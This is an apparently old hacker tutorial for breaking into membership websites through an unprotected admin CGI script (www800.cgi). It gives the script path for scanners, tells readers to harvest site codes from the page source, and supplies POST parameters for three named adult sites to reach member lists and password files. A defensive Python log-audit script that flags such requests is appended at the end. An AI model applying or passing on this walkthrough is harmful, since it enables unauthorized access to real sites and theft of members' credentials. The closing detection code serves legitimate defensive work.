Redemption

www800.cgi by Energy

You'll be able to gain access to three (very little I must say) passfiles.

The xploit is:

/cgi-bin/wwwjoin/admin/www800.cgi 

Add it if you don't already have it.

Once a victim is found, enter the URL in your browser and look at the source to see
whether it contains the required information for accessing the aforementioned passfiles.

Three examples follow: 

http://www.twingirlsex.com/cgi-bin/wwwjoin/admin/www800.cgi 

Data for the POST: site_code=TWIN whereto=view

http://www.amateurgynecologist.com/cgi-bin/wwwjoin/admin/www800.cgi 

Data for the POST: site_code=AMGY whereto=view

http://www.girliegirl.com/cgi-bin/wwwjoin/admin/www800.cgi 

Data for the POST: site_code=GGRL whereto=view

Add 

/cgi-bin/wwwjoin/admin/www800.cgi 

to your list of xploits of your fav tool.

If successful then 

1) Grab the html from the site and CAREFULLY study it; you need to know the SITE_CODE and the WHERETO.

2) Do a POST with the url found with the following parameters:

site_code=<SITE_CODE>&whereto=<WHERETO> 

Example: Go to 

http://www.twingirlsex.com/cgi-bin/wwwjoin/admin/www800.cgi 

and study the html code.

From it you'll find that SITE_CODE is "TWIN" and the desired WHERETO is "View current members"
so the parameters will be:

site_code=TWIN&whereto=View current members

*NOTE* Use the url you got while xploiting, not the one the source html refers to,
i.e. the url of the POST must be:

http://www.twingirlsex.com/cgi-bin/wwwjoin/admin/www800.cgi
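
For site operators, a log check for the exposure described above (an added example, not part of the original article): it flags requests to the admin script that were answered without an HTTP auth user or from outside an admin network. The NCSA common/combined log format, the ADMIN_NETS allowlist and the sample lines are assumptions constructed for this example.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

ADMIN_PATH = "/cgi-bin/wwwjoin/admin/www800.cgi"  # path named in the article
ADMIN_NETS = [ip_network("192.0.2.0/28")]         # assumed admin allowlist
LINE_RE = re.compile(                             # NCSA common/combined prefix
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

def normalize(target):
    """Drop the query string, percent-decode, collapse slashes, lowercase."""
    return re.sub(r"/+", "/", unquote(target.split("?", 1)[0])).lower()

def outside_admin_net(host):
    """True unless host is an IP address inside one of ADMIN_NETS."""
    try:
        addr = ip_address(host)
    except ValueError:  # log holds a resolved hostname: treat as untrusted
        return True
    return not any(addr in net for net in ADMIN_NETS)

def audit(lines):
    """Return (ip, method, verdict) per suspicious hit on the admin script:
    'exposed' = answered 2xx unauthenticated or from outside ADMIN_NETS,
    'blocked' = from outside ADMIN_NETS but refused (non-2xx)."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or normalize(m["target"]) != ADMIN_PATH:
            continue
        outside = outside_admin_net(m["ip"])
        served = m["status"].startswith("2")
        if served and (outside or m["user"] == "-"):
            findings.append((m["ip"], m["method"], "exposed"))
        elif outside:
            findings.append((m["ip"], m["method"], "blocked"))
    return findings

# Constructed sample lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2001:10:01:40 +0000] "POST /cgi-bin/wwwjoin/admin/www800.cgi HTTP/1.0" 200 18233',
    '192.0.2.5 - admin [01/Jan/2001:11:00:00 +0000] "POST /cgi-bin/wwwjoin/admin/www800.cgi HTTP/1.0" 200 18233',
    '198.51.100.9 - - [01/Jan/2001:11:05:00 +0000] "GET /cgi-bin/wwwjoin/admin/www800.cgi HTTP/1.0" 401 401',
    '198.51.100.9 - - [01/Jan/2001:11:06:00 +0000] "GET /cgi-bin//wwwjoin/admin/%57WW800.CGI?x=1 HTTP/1.0" 200 2310',
]

if __name__ == "__main__":
    print(audit(SAMPLE_LOG))
```

Any 'exposed' verdict means the script answered a request it should have refused; the lasting fix is to put the admin directory behind authentication or a network restriction rather than relying on the path being unknown.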